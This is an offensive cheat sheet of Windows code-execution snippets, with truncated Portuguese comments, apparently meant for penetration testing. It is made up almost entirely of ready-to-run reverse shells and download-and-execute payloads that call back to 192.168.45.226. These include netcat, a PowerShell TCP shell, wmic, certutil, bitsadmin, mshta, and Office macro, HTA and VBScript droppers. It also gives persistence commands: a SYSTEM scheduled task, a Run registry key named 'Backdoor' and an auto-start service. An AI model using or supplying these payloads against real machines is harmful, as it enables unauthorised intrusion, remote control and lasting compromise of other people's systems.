Code Execution - Windows Snippets
Netcat - Reverse Shell
nc.exe -nv 192.168.45.226 9001 -e cmd.exe
nc.exe) no sistema alvo.
PowerShell - Reverse Shell
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
nc.exe.
Cmd.exe - Reverse Shell
cmd.exe /c "echo open 192.168.45.226 9001 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get reverse_shell.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt"
VBScript - Reverse Shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(WScript.Arguments.Item(1),True) >> wget.vbs
echo ts.Write http.responseText >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://192.168.45.226/shell.exe shell.exe
WMI - Command Execution
wmic process call create "cmd.exe /c calc.exe"
Windows Management Instrumentation (WMI) - Reverse Shell
wmic /node:192.168.45.226 /user:Administrator process call create "powershell -ExecutionPolicy Bypass -NoP -NonI -W Hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')"
Windows Task Scheduler - Persistência
schtasks /create /sc minute /mo 1 /tn "UpdateService" /tr "C:\Users\Public\shell.exe" /ru SYSTEM
Windows Registry - Persistência via CMD
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Users\Public\shell.exe" /f
Microsoft Office VBA Macro - Reverse Shell
Sub AutoOpen()
Dim s As Object
Set s = CreateObject("WScript.Shell")
s.Run "cmd /c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')"
End Sub
Windows Script Host (WSH) - Reverse Shell
echo Set o = CreateObject("WScript.Shell") > revshell.vbs
echo o.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')", 0, True >> revshell.vbs
wscript revshell.vbs
HTA (HTML Application) - Execution
<html>
<body>
<script>
var o = new ActiveXObject("WScript.Shell");
o.run("powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')");
</script>
</body>
</html>
.hta e aberto para execução automática do código malicioso.
JavaScript (JScript) - Reverse Shell
var o = new ActiveXObject("WScript.Shell");
o.run("powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')");
Windows BitsAdmin - Download & Execute
bitsadmin /transfer myjob http://192.168.45.226/shell.exe C:\Users\Public\shell.exe
start C:\Users\Public\shell.exe
bitsadmin para baixar e executar um shell.
Windows CertUtil - Download & Execute
certutil -urlcache -split -f "http://192.168.45.226/shell.exe" C:\Users\Public\shell.exe
start C:\Users\Public\shell.exe
certutil.
Mshta - Executando Código Remoto
mshta "http://192.168.45.226/payload.hta"
mshta.
Windows Service - Persistência
sc create backdoor binPath= "C:\Users\Public\shell.exe" start= auto
Windows Rundll32 - Code Execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('Hello from Rundll32');"
rundll32.